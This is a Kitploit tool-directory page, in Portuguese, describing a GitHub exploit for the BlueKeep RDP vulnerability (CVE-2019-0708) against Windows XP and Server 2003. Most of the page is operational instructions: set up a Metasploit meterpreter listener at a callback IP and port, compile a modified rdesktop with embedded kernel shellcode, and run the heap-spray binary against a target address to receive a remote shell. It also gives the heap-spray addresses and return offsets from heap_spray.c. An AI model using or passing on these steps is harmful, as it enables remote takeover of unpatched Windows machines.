Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2019-0708_bluekeep_rce — funciona no xp (todas as versões sp2 sp3) | Kitploit
Ferramentas/GitHubGitHub/coolboy4me/cve-2019-0708_bluekeep_rce
Análise de VulnerabilidadesExploraçãoShellcodeTestes de PenetraçãoFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubcoolboy4me/cve-2019-0708_bluekeep_rce

cve-2019-0708_bluekeep_rce

funciona no xp (todas as versões sp2 sp3)

Ver Repositório
75143há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
  1. Execute o msfconsole meterpreter/multi/handler escutando em 192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. Modifique o config, configure o IP e a porta de callback 192.168.116.133 6000
  4. Execute ./heap_spray 192.168.116.134 (134 é o endereço do XP, memória >= 2 GB)
  5. O msfconsole meterpreter obterá a sessão

Nota: shellcode/shellcode.asm é o código fonte do shellcode do kernel, após compilação e conversão para binário, ele se torna o arquivo rdesktop-1.5.0\cf517d077e9c152120787eb6b251615b, que será compilado diretamente no programa durante o make.

Atualmente só suporta XP, requer memória do XP >= 2 GB

Se precisar suportar 2003, é necessário modificar o endereço da macro HEAP_SPRAY_ADDRESS dentro de heap_spray.c. Após testes repetidos, este endereço varia em diferentes versões do sistema 03 e diferentes tamanhos de memória. No entanto, se for testar na sua própria máquina, é possível explorar com sucesso no 03. Não é universal.

heap_spray.c

#ifdef _2003

#define HEAP_SPRAY_ADDRESS 0x953b09c0 // É necessário depurar o endereço do shellcode de heap spray com windbg. Se alguém encontrar uma solução universal, por favor submeta um issue.

#define IcaChannelInputInternal_RET_OFFSET 0x268

#else

#define IcaChannelInputInternal_RET_OFFSET 0x274

#define HEAP_SPRAY_ADDRESS 0x88c969c0

#endif

Teste no 03

  1. Execute o msfconsole meterpreter/multi/handler escutando em 192.168.116.133:6000
  2. cd rdesktop-1.5.0 && make
  3. Modifique o config, configure o IP e a porta de callback 192.168.116.133 6000
  4. Execute ./_2003_heap_spray 192.168.116.135 (135 é o endereço do 03, memória >= 2 GB)
  5. O msfconsole meterpreter obterá a sessão

login

Baixar ferramenta